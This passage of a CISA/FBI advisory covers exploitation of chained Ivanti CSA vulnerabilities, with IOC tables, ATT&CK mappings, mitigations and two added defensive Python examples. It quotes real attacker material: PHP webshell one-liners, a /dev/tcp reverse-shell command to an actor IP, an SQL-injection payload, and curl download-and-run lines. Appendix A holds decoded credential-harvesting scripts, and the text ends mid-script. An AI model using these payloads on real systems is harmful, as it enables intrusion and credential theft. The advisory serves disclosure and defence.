    CVE-2024-8963 [CWE-22: Path Traversal] is an administrative bypass vulnerability that allows threat actors to remotely access restricted features within the appliance. When used in conjunction with CVE-2024-8190 [CWE-78: OS Command Injection], threat actors can remotely authenticate into a victim’s network and execute arbitrary commands on the appliance [T1219].[2][3] CVE-2024-9379 [CWE-89: SQL Injection] allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.[1] CVE-2024-9380 [CWE-77: Command Injection] allows a remote authenticated attacker with admin privileges to obtain RCE.[1] According to Ivanti’s advisories and industry reporting, these vulnerabilities were exploited as zero days.[4] Based on evidence of active exploitation, CISA added CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 to its Known Exploited Vulnerabilities (KEV) Catalog.

    According to CISA and trusted third-party incident response data, threat actors chained the above listed vulnerabilities to gain initial access, conduct RCE, obtain credentials, and implant webshells on victim networks. The primary exploit paths included two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380. The other chain exploited CVE-2024-8963 and CVE-2024-9379. After exploitation, the actors moved laterally in one victim; other victims had no follow-on activity because they identified anomalous activity and implemented mitigation measures.

    Exploit Chain 1

    The threat actors leveraged CVE-2024-8963 in conjunction with the remote code execution vulnerabilities CVE-2024-8190 and CVE-2024-9380. Acting as a nobody user [T1564.002], the threat actors first sent a GET request to datetime.php to acquire session and cross-site request forgery (CSRF) tokens using GET /client/index.php%3F.php/gsb/datetime[.]php [T1071.001]. They followed this in quick succession with a POST request to the same endpoint, using the TIMEZONE input field to manipulate the setSystemTimeZone function and execute code. In some confirmed compromises, the actors used this method to run base64-encoded Python scripts that harvested encrypted admin credentials from the database [T1552.001]. Note: The actors used multiple script variations. See Appendix A for examples of encoded and decoded scripts.

    In some cases, the threat actors exfiltrated the encrypted admin credentials then decrypted them offline [TA0010]. In other cases, the threat actors leveraged an executable matching the regular expression php\w{6} located in the /tmp directory to decrypt the credentials prior to exfiltration; this tool was unrecoverable. After obtaining credentials, the actors logged in and exploited CVE-2024-9380 to execute commands from a higher privileged account. The actors successfully sent a GET request to /gsb/reports[.]php. They immediately followed this with a POST request using the TW_ID input field to execute code to implant webshells for persistence [T1505.003]. In one confirmed compromise, the threat actors tried to create webshells using two different paths:

        echo "<?php system(@\$_REQUEST['a']);">/opt/ivanti/csa/broker/webroot/client/help.php
        echo "<?php system('/bin/sudo '. @\$_REQUEST['a']);" > /opt/landesk/broker/webroot/gsb/help.php

    In the same compromise, the actors used the exploit to execute the following script to create a reverse Transmission Control Protocol command and control (C2) channel: bash -i >&/dev/tcp/107.173.89[.]16/8000 0>&1. In another compromise, the threat actors maintained their presence on the victim’s system for a longer amount of time. The threat actors used sudo commands to disable the vulnerability in DateTimeTab.php, modify and remove webshells, and remove evidence of exploitation [T1548.003]. See Appendix B for the list of sudo commands used.

    Lateral Movement

    In one case, there was evidence of lateral movement after the threat actors gained access and established a foothold through this exploit chain. It is suspected that the threat actors gained access into a Jenkins server running a vulnerable, outdated version [T1068]. Logs on the Jenkins machine showed that a command in the bash history contained credentials to the postgres server. The threat actors then attempted to log into the Virtual Private Network (VPN) server but were unsuccessful. Prior to moving laterally, the actors likely performed discovery on the CSA device using Obelisk and GoGo to scan for vulnerabilities [T1595.002].

    Exploit Chain 2

    In one confirmed compromise, the actors used a similar exploit chain, exploiting CVE-2024-8963 in conjunction with CVE-2024-9379, using GET /client/index.php%3f.php/gsb/broker.php for initial access. After the threat actors gained initial access, they attempted to exploit CVE-2024-9379 to create a webshell to gain persistent access. They executed GET and POST requests in quick succession to /client/index.php%3F.php/gsb/broker.php. In the POST body, threat actors entered the following string in the lockout attempts input box:

        LOCKOUTATTEMPTS = 1 ;INSERT INTO user_info(username, accessed, attempts) VALUES ('''echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>/.k''', NOW(), 10)

    The first portion of the command (LOCKOUTATTEMPTS=1) fit the format of the application and was properly handled by the application. However, the second portion of the command, a SQL injection [T1190], was not properly handled by the application. Regardless, the application processed both commands, allowing the threat actors to insert a user into the user_info table. After inserting valid bash code as a user in the user_info table, the threat actors attempted to login as the user. The authoring agencies believe the threat actors knew this login would fail but were attempting to coerce the application into handling the bash code improperly. In this attempt, the application did not evaluate the validity of the login, but instead ran echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>./k as if it were code. The threat actors repeated the process of echo commands until they built a valid web shell [T1059]. However, there were no observations that the threat actors were successful.

    Detection of Activity

    According to incident response data from three victim organizations, the actors were unsuccessful with follow-on activity due to the organizations’ rapid detection of the malicious activity. To remediate exploitation, all three organizations replaced the virtual machines with clean and upgraded versions.

    Victim Organization 1: The first organization detected malicious activity early in the exploitation. A system administrator detected the anomalous creation of user accounts. After investigation, the organization remediated the incident. While it is likely admin credentials were exfiltrated, there were no signs of lateral movement.

    Victim Organization 2: This organization had an endpoint protection platform (EPP) installed on their system that alerted when the threat actors executed a base64-encoded script to create webshells. There were no indications of webshells successfully being created or of lateral movement.

    Victim Organization 3: This organization leveraged the IOC findings from the other two victim sites to quickly detect malicious activity. This threat activity included the download and deployment of Obelisk and GoGo Scanner, which generated a large number of logs. The organization used these logs to identify anomalous activity.

    Indicators of Compromise

    See Table 1 through Table 3 for IOCs related to the threat actors’ exploitation of CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 in Ivanti CSA.

    Disclaimer: Some IP addresses in this cybersecurity advisory may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.
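The LOCKOUTATTEMPTS string in Exploit Chain 2 is a stacked-statement SQL injection through a field the application expected to hold a number. The following is an added example, not code from the advisory, CISA or Ivanti, that models that failure mode and its fix in Python with SQLite: a hypothetical single-row settings table and a user_info table (the table names are assumptions), a handler that splices the raw field into a multi-statement SQL string, and a hardened handler that validates the field as a bounded integer and binds it as a parameter. The injected value is constructed to have the shape the advisory describes, with a neutral placeholder username.

```python
import re
import sqlite3

# Constructed sample input: a numeric prefix followed by ';' and a stacked
# INSERT, the shape the advisory describes. The username is a placeholder.
INJECTED_VALUE = (
    "1 ;INSERT INTO user_info(username, accessed, attempts) "
    "VALUES ('injected-user', '2024-09-05', 10)"
)
BENIGN_VALUE = "5"


def fresh_db():
    """In-memory schema loosely modelled on the tables the advisory names (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE settings (lockoutattempts INTEGER);"
        "INSERT INTO settings VALUES (3);"
        "CREATE TABLE user_info (username TEXT, accessed TEXT, attempts INTEGER);"
    )
    return conn


def update_lockout_vulnerable(conn, raw_value):
    """Vulnerable pattern: the field is spliced into SQL text and the whole string
    is handed to a multi-statement executor, so everything after ';' runs as well."""
    conn.executescript("UPDATE settings SET lockoutattempts = " + raw_value)


def update_lockout_hardened(conn, raw_value):
    """Hardened pattern: accept only a bounded integer, then bind it as a parameter.
    Returns True when the update was applied, False when the input was rejected."""
    if not re.fullmatch(r"\d{1,3}", raw_value.strip()):
        return False
    n = int(raw_value)
    if not 1 <= n <= 100:
        return False
    conn.execute("UPDATE settings SET lockoutattempts = ?", (n,))
    conn.commit()
    return True


def lockout_value(conn):
    return conn.execute("SELECT lockoutattempts FROM settings").fetchone()[0]


def user_count(conn):
    return conn.execute("SELECT COUNT(*) FROM user_info").fetchone()[0]


def demo():
    """Run both handlers on the injected and benign values; report what each did."""
    vuln = fresh_db()
    update_lockout_vulnerable(vuln, INJECTED_VALUE)
    hard = fresh_db()
    injected_accepted = update_lockout_hardened(hard, INJECTED_VALUE)
    benign_accepted = update_lockout_hardened(hard, BENIGN_VALUE)
    return {
        "vulnerable_lockout": lockout_value(vuln),        # the UPDATE ran
        "vulnerable_users_added": user_count(vuln),       # the stacked INSERT ran too
        "hardened_injected_accepted": injected_accepted,  # rejected before any SQL
        "hardened_benign_accepted": benign_accepted,
        "hardened_lockout": lockout_value(hard),
        "hardened_users_added": user_count(hard),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Parameter binding alone would stop the stacked statement; the explicit integer check in front of it also turns a malformed value into a clean rejection that the application can log, which is the kind of event Victim Organization 1 noticed (anomalous account creation) and that an EPP or EDR rule can key on. Separately, the database role the web tier uses should not be able to insert into the account table at all if the feature only needs to update a setting.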
    Table 1: IP Address Used for Credential Theft, September 2024

    File Name | IP Address | Description
    /client/index.php%3f.php/gsb/datetime.php | 142.171.217[.]195 | /var/log/messages
    /client/index.php%3f.php/gsb/datetime.php | 154.64.226[.]166 | /var/log/messages-20240904.gz
    /client/index.php%3f.php/gsb/datetime.php | 216.131.75[.]53 |
    /client/index.php%3f.php/gsb/datetime.php | 23.236.66[.]97 | /var/log/messages-20240905.gz
    /client/index.php%3f.php/gsb/datetime.php | 38.207.159[.]76 | /var/log/messages-20240906.gz

    Table 2: Survey 2, Ivanti CSA Network IOC List, September 2024

    File Name | IP Address | Description
    | 149.154.167[.]41 |
    | 95.161.76[.]100 |
    | hxxps://file.io/E50vtqmJP5aa |
    | hxxps://file.io/RBKuU8gicWt |
    | hxxps://file.io/frdZ9L18R7Nx |
    | hxxp://ip.sb |
    | hxxps://pan.xj.hk/d/ 6401646e701f5f47518ecef48a308a36/redis |
    | 142.171.217[.]195 |
    | 108.174.199[.]200 |
    | 206.189.156[.]69 |
    | 108.174.199[.]200/Xa27efd2.tmp |
    | 142.171.217[.]195 |

    Table 3: Additional IOCs Derived from Incident Response, September 2024

    Type | IOC | Description
    Ipv4 | 107.173.89[.]16 |
    Ipv4 | 38.207.159[.]76 |
    Ipv4 | 142.171.217[.]195 |
    Ipv4 | 154.64.226[.]166 |
    Ipv4 | 156.234.193[.]18 |
    Ipv4 | 216.131.75[.]53 |
    Ipv4 | 205.169.39[.]11 |
    Ipv4 | 23.236.66[.]97 |
    Ipv4 | 149.154.176[.]41 |
    Ipv4 | 95.161.76[.]100 |
    Ipv4 | 142.171.217[.]195 |
    Ipv4 | 108.174.199[.]200 |
    Ipv4 | 206.189.156[.]69 |
    Ipv4 | 142.171.217[.]195 |
    Ipv4 | 67.217.228[.]83 |
    Ipv4 | 203.160.72[.]174 |
    Ipv4 | 142.11.217[.]3 |
    Ipv4 | 104.168.133[.]228 |
    Ipv4 | 64.176.49[.]160 |
    Ipv4 | 45.141.215[.]17 |
    Ipv4 | 142.171.217[.]195 |
    Ipv4 | 98.101.25[.]30 |
    Ipv4 | 216.131.75[.]53 |
    Ipv4 | 134.195.90[.]71 |
    Ipv4 | 23.236.66[.]97 |
    Hash | a50660fb31df96b3328640fdfbeea755 |
    Hash | 53c5b7d124f13039eb62409e1ec2089d |
    Hash | 698a752ec1ca43237cb1dc791700afde |
    Hash | aa69300617faab4eb39b789ebfeb5abe |
    Hash | c2becc553b96ba27d60265d07ec3bd6c |
    Hash | cacc30e2a5b2683e19e45dc4f191cebc | /opt/ivanti/csa/broker/webroot/client/help.php
    Hash | 061e5946c9595e560d64d5a8c65be49e | /opt/landesk/broker/webroot/gsb/view.php
    Hash | e35cf026057a3729387b7ecfb213ae 62a611f0f1a418876b11c9df3b56885bed | /tmp/brokerdebug
    Hash | c7d20ca6fe596009afaeb725fec8635f | /opt/landesk/broker/webroot/gsb/help.php
    Hash | F7F81AE880A17975F60E1E0FE1A4048B | /opt/landesk/broker/webroot/gsb/DateTimeTab.php
    Hash | 86B62FFD33597FD635E01B95F08BB996 | /opt/landesk/broker/webroot/gsb/style.php
    Hash | DD975310201079CACD4CDE6FACAB8C1D | /opt/landesk/broker/webroot/client/index.php
    Hash | 1B20E9310CA815F9E2BD366FB94E147F | /sbin/systemd (configuration file at /WpService.conf)
    Hash | 30f57e14596f1bcad7cc4284d1af4684 | /sbin/systemd (configuration file at /WpService.conf)
    URL | hxxps://file.io/E50vtqmJP5aa |
    URL | hxxps://file.io/RBKuU8gicWt |
    URL | hxxps://file.io/frdZ9L18R7Nx |
    URL | hxxp://ip.sb |
    URL | hxxps://pan.xj.hk/d/ 6401646e701f5f47518ecef48a308a36/redis |
    URL | 108.174.199.200/Xa27efd2.tmp |
    URL | 45.33.101.53/log |
    URL | 45.33.101.53/log2 |
    URL | cri07nnrg958pkh6qhk0977u8c83jog6t.oast[.]fun |
    URL | cri07nnrg958pkh6qhk0yrgy1e76p1od6.oast[.]fun |
    domain | gg.oyr2ohrm.eyes[.]sh |
    domain | ggg.oyr2ohrm.eyes[.]sh |
    domain | gggg.oyr2ohrm.eyes[.]sh |
    domain | txt.xj[.]hk |
    domain | book.hacktricks[.]xyz |
    host | sh -c setsid /dev/shm/redis & |
    host | sh -c curl -k https://file[.]io/1zqvMYY1dpkk -o /dev/shm/redis2 |
    host | sh -c mv /dev/shm/redis2 /dev/shm/redis |
    host | sh -c rm /dev/shm/* |
    host | rm /dev/shm/PostgreSQL.1014868572 /dev/shm/redis |
    host | 78cc672218949a9ec87407ad3bcb5db6 | Agent.zip
    host | d13f71e51b38ffef6b9dc8efbed27615 | Log.log
    host | d88bfac2b43509abdc70308bef75e2a6 | Log.exe
    host | R.exe (MD5: 60d5648d35bacf5c7aa713b2a0d267d3) | R.exe
    host | ae51c891d2e895b5ca919d14edd42c26 | CAService.exe
    host | d88bfac2b43509abdc70308bef75e2a6 | Lgfxsys.exe
    host | f82847bccb621e6822a3947bc9ce9621 | NetlO.cfg
    host | c894f55c8fa9d92e2dd2c78172cff745 | XboVFyKw.tmp
    host | MD5: Unknown | Wi.bat
    host | MD5: Unknown | dCUgGXfm.tmp
    host | MD5: Unknown | DijZViHC.tmp
    /var/secure log | nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/ln -sf |
    /var/secure log | nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/mv /tmp/php.ini /etc/php.ini |
    /var/secure log | nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/sbin/hwclock --localtime --systohc |
    /var/secure log | nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/subin/backuptool --fullList |
    Ipv4 | 142.171.217[.]195 |
    Ipv4 | 107.173.89[.]16 |
    Ipv4 | 192.42.116[.]210 |
    Ipv4 | 82.197.182[.]161 |
    Ipv4 | 154.213.185[.]230 |
    Ipv4 | 216.131.75[.]53 |
    Ipv4 | 23.236.66[.]97 |
    Ipv4 | 208.105.190[.]170 |
    Ipv4 | 136.144.17[.]145 |
    Ipv4 | 136.144.17[.]133 |
    Ipv4 | 216.73.162[.]56 |
    Ipv4 | 104.28.240[.]123 |
    Ipv4 | 163.5.171[.]49 |
    Ipv4 | 89.187.178[.]179 |
    Ipv4 | 163.5.171[.]49 |
    Ipv4 | 203.160.86[.]69 |
    Ipv4 | 185.220.69[.]83 |
    Ipv4 | 185.199.103[.]196 |
    Ipv4 | 188.172.229[.]15 |
    Ipv4 | 155.138.215[.]144 |
    Ipv4 | 64.176.49[.]160 |
    Ipv4 | 185.40.4[.]38 |
    Ipv4 | 216.131[.]75.53 |
    Ipv4 | 185.40.4[.]95 |

    MITRE ATT&CK Tactics and Techniques

    See Table 4 to Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

    Table 4: Reconnaissance

    Technique Title | ID | Use
    Active Scanning: Vulnerability Scanning | T1595.002 | Threat actors performed reconnaissance by using Obelisk and GoGo to scan for vulnerabilities.

    Table 5: Initial Access

    Technique Title | ID | Use
    Exploit Public-Facing Application | T1190 | Threat actors leveraged weaknesses in applications that are not properly handled to compromise network device protocols, perform SQL injections, and generally exploit applications.

    Table 6: Execution

    Technique Title | ID | Use
    Command and Scripting Interpreter | T1059 | Threat actors abused command and script interpreters to execute commands, scripts, or binaries.

    Table 7: Persistence

    Technique Title | ID | Use
    Modify Authentication Process | T1556 | Threat actors executed an authentication bypass by exploiting the authentication mechanisms of a device to gain access to organizations’ networks.
    Server Software Component: Web Shell | T1505.003 | Threat actors executed code to implant webshells for persistence.

    Table 8: Privilege Escalation

    Technique Title | ID | Use
    Exploitation for Privilege Escalation | T1068 | Threat actors leveraged weaknesses to gain access via an outdated, vulnerable version of a server.

    Table 9: Defense Evasion

    Technique Title | ID | Use
    Hide Artifacts: Hidden Users | T1564.002 | Threat actors acted as a hidden user to disguise their presence on a system.
    Deobfuscate/Decode Files or Information | T1140 | Threat actors decrypted credentials prior to exfiltration by leveraging native tools located in the extracted backup file.
    Abuse Elevation Control Mechanism: Sudo and Sudo Caching | T1548.003 | Threat actors used sudo commands to disable vulnerabilities, modify and remove webshells, and remove evidence of exploitation.

    Table 10: Credential Access

    Technique Title | ID | Use
    Unsecured Credentials: Credentials in Files | T1552.001 | Threat actors harvested encrypted admin credentials to gain further access.

    Table 11: Lateral Movement

    Technique Title | ID | Use
    Exploitation of Remote Services | T1210 | Threat actors exploited CSAs via remote services to gain access to an organization’s networks by leveraging programming errors, EOL systems, and operating systems.

    Table 12: Command and Control

    Technique Title | ID | Use
    Remote Access Software | T1219 | Threat actors attempted to remotely authenticate into a victim’s network and execute arbitrary commands on the appliance.
    Application Layer: Web Protocol | T1071.001 | Threat actors used tools such as GET or POST requests to acquire session and CSRF tokens.

    Table 13: Exfiltration

    Technique Title | ID | Use
    Exfiltration | TA0010 | Threat actors exfiltrated encrypted admin credentials or other encrypted data for future use.
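The request sequence in Exploit Chains 1 and 2, the log sources in Table 1, and the /var/secure sudo denials in Table 3 give a defender three concrete things to hunt for. Below is an added hunting example in Python; it is not part of the advisory and not a CISA or Ivanti tool. It refangs the advisory's defanged indicators, flags requests in the CVE-2024-8963 bypass form (the encoded %3f.php segment in front of the gsb/ endpoints, so a plain /gsb/datetime.php request by an administrator is not flagged), pairs a GET with a POST to the same bypass path from the same source within a few seconds, and flags sudo denials for the nobody account whose working directory is under the appliance webroot. The sample log lines are constructed, and the combined-log request layout is an assumption: the appliance's real log format will need WEB_RE adapted.

```python
import re
from datetime import datetime

# Indicators copied from the advisory's tables, in the defanged form the advisory uses.
DEFANGED_IOCS = ["142.171.217[.]195", "107.173.89[.]16", "154.64.226[.]166",
                 "hxxps://file.io/E50vtqmJP5aa"]

# Webroot paths named in the advisory's webshell and sudo indicators.
WEBROOT_PREFIXES = ("/opt/landesk/broker/webroot", "/opt/ivanti/csa/broker/webroot")

# Constructed sample request log (assumption: generic combined-log layout).
# 142.171.217.195 is listed in Table 1; 198.51.100.7 and 10.0.0.5 are
# documentation addresses standing in for an unlisted source and an administrator.
WEB_LOG = """\
142.171.217.195 - - [05/Sep/2024:01:09:55 +0000] "GET /client/index.php%3f.php/gsb/datetime.php HTTP/1.1" 200 512
142.171.217.195 - - [05/Sep/2024:01:09:57 +0000] "POST /client/index.php%3f.php/gsb/datetime.php HTTP/1.1" 200 77
10.0.0.5 - - [05/Sep/2024:01:10:03 +0000] "GET /gsb/datetime.php HTTP/1.1" 200 512
198.51.100.7 - - [05/Sep/2024:02:00:00 +0000] "GET /client/index.php%3F.php/gsb/broker.php HTTP/1.1" 200 1024
198.51.100.7 - - [05/Sep/2024:02:00:01 +0000] "POST /client/index.php%3F.php/gsb/broker.php HTTP/1.1" 200 1024
"""

# Constructed sudo denial lines in sudo's syslog layout; the nobody entries follow
# the pattern given in Table 3 ("user NOT in sudoers ... PWD=<webroot>").
SECURE_LOG = """\
Sep  5 01:10:20 csa sudo:   nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/mv /tmp/php.ini /etc/php.ini
Sep  5 01:10:21 csa sudo:   nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/sbin/hwclock --localtime --systohc
Sep  5 01:12:00 csa sudo:   admin : user NOT in sudoers ; TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/bin/ls /root
"""

# Bypass form of the request: "%3f.php" in front of the gsb/ endpoints the advisory names.
BYPASS_PATH = re.compile(r"index\.php%3f\.php/gsb/(datetime|broker|reports)\.php", re.IGNORECASE)
WEB_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)')
SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : user NOT in sudoers ;.*?PWD=(?P<pwd>\S+) ;")


def refang(ioc):
    """Turn the advisory's defanged notation back into a matchable string."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def parse_web(log):
    """Yield (ip, timestamp, method, path) for each request line that parses."""
    reqs = []
    for line in log.splitlines():
        m = WEB_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            reqs.append((m["ip"], ts, m["method"], m["path"]))
    return reqs


def hunt_web(log, ioc_ips, window_seconds=10):
    """Flag bypass-form requests, GET-then-POST pairs to the same bypass path from one
    source inside the window, and sources that appear in the IOC list (once each)."""
    findings, seen_ioc = [], set()
    reqs = parse_web(log)
    for i, (ip, ts, method, path) in enumerate(reqs):
        if ip in ioc_ips and ip not in seen_ioc:
            seen_ioc.add(ip)
            findings.append({"type": "ioc_ip", "ip": ip})
        if not BYPASS_PATH.search(path):
            continue
        findings.append({"type": "bypass_path", "ip": ip, "method": method, "path": path})
        if method == "GET":
            for ip2, ts2, method2, path2 in reqs[i + 1:]:
                gap = (ts2 - ts).total_seconds()
                if ip2 == ip and path2 == path and method2 == "POST" and 0 <= gap <= window_seconds:
                    findings.append({"type": "get_post_pair", "ip": ip, "path": path, "gap_s": gap})
                    break
    return findings


def hunt_sudo(log):
    """Flag sudo denials for the web service account whose working directory is a webroot."""
    findings = []
    for line in log.splitlines():
        m = SUDO_RE.search(line)
        if m and m["user"] == "nobody" and m["pwd"].startswith(WEBROOT_PREFIXES):
            findings.append({"type": "sudo_from_webroot", "pwd": m["pwd"], "line": line.strip()})
    return findings


def summarize(web_log=WEB_LOG, secure_log=SECURE_LOG, iocs=DEFANGED_IOCS):
    """Count findings by type over both logs."""
    ioc_ips = {refang(i) for i in iocs if not i.startswith("hxxp")}
    counts = {}
    for f in hunt_web(web_log, ioc_ips) + hunt_sudo(secure_log):
        counts[f["type"]] = counts.get(f["type"], 0) + 1
    return counts


if __name__ == "__main__":
    ioc_ips = {refang(i) for i in DEFANGED_IOCS if not i.startswith("hxxp")}
    for finding in hunt_web(WEB_LOG, ioc_ips) + hunt_sudo(SECURE_LOG):
        print(finding)
    print(summarize())
```

On the constructed input the unlisted source 198.51.100.7 is still flagged twice (bypass path and GET/POST pair), which is the point of matching on request shape rather than on IP alone: the advisory's own disclaimer notes that listed addresses may also carry legitimate traffic, and a source that is not yet on any list still exhibits the same sequence. The sudo rule keys on the service account and working directory rather than on a specific command, so the ln, mv, hwclock and backuptool variants in Table 3 all match.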
    Incident Response

    If compromise is detected, the authoring agencies recommend that organizations:

    - Quarantine or take offline potentially affected hosts.
    - Reimage compromised hosts.
    - Provision new account credentials. For Ivanti hosts with Active Directory (AD) access, threat actors can trivially export active domain administrator credentials during initial compromise. Until there is evidence to the contrary, it is assumed that AD access on compromised systems is connected to external authentication systems such as Lightweight Directory Access Protocol and AD.
    - Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections. Note: Removing malicious administrator accounts may not fully mitigate risk considering threat actors may have established additional persistence mechanisms.
    - Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).

    Mitigations

    CISA and FBI recommend organizations:

    - Upgrade to the latest supported version of Ivanti CSA immediately for continued support.[3] Please note that Ivanti CSA 4.6 is EOL and no longer receives patches or third-party libraries. Customers must upgrade to the latest version of the product for continued support.
    - Install endpoint detection and response (EDR) on the system to alert network defenders on unusual and potentially malicious activity.
    - Establish a baseline and maintain detailed logs of network traffic, account behavior, and software. This can assist network defenders in identifying anomalies that may indicate malicious activity more quickly.
    - Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
    - Secure remote access tools by:
      - Implementing application controls to manage and control software execution, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
      - Strictly limiting the use of remote desktop protocol (RDP) and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:
        - Audit the network for systems using RDP.
        - Close unused RDP ports.
        - Enforce account lockouts after a specified number of attempts.
        - Apply phishing-resistant multifactor authentication (MFA).
        - Log RDP login attempts.
    - Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec.
    - Follow best cybersecurity practices in your production and enterprise environments, including mandating phishing-resistant multifactor authentication (MFA) for all staff and services. For additional best practices, see CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common tactics, techniques, and procedures. Because the CPGs are a subset of best practices, CISA and FBI also recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).

    Validate Security Controls

    In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started:

    1. Select an ATT&CK technique described in this advisory (see Table 4 through Table 13).
    2. Align your security technologies against the technique.
    3. Test your technologies against the technique.
    4. Analyze your detection and prevention technologies’ performance.
    5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
    6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

    CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

    References

    [1] Ivanti: Security Advisory Ivanti CSA (Cloud Services Application) (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381)
    [2] Ivanti: Security Advisory Ivanti Cloud Service Appliance (CSA) (CVE-2024-8190)
    [3] Ivanti: Security Advisory Ivanti CSA 4.6 (Cloud Services Appliance) (CVE-2024-8963)
    [4] Fortinet: Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA

    Contact Information

    Organizations are encouraged to report suspicious or criminal activity related to information in this advisory to: CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870) or your local FBI field office.
    When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.

    Disclaimer

    The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.

    Version History

    January 22, 2025: Initial version.
    January 31, 2025: Removed IOCs.

    Appendix A: Encoded and Decoded Scripts

    Decoded Python Scripts

    import os, re, base64, time
    os.chdir("/tmp")
    d = "/backups"
    def set_msg(p, t='', m=''):
        if t and m:
            msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
        else:
            msg = ''
        os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
    try:
        r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
    except:
        r = None
    with open("/opt/landesk/broker/broker.conf") as f:
        dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
    if r:
        p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'admin'\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':')
        os.system("tar zxvf {}".format(r))
        while True:
            for f in os.listdir('.'):
                if re.match("php\w{6}", f):
                    os.chmod(f, 0o777)
                    m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
                    if m:
                        set_msg(dbpwd, "PASSWORD", m)
                        time.sleep(30)
                        set_msg(dbpwd)
                        exit()
    else:
        set_msg(dbpwd, 'ERROR', 'NO BACKUP')

    import os, re, base64, time
    os.chdir("/tmp")
    d = "/backups"
    def set_msg(p, t='', m=''):
        if t and m:
            msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
        else:
            msg = ''
        os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='service'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
    try:
        r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
    except:
        r = None
    with open("/opt/landesk/broker/broker.conf") as f:
        dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
    if r:
        p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\\'service'\\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("\n")[-4].strip().split(':')
        os.system("tar zxvf {}".format(r))
        while True:
            for f in os.listdir('.'):
                if re.match("php\w{6}", f):
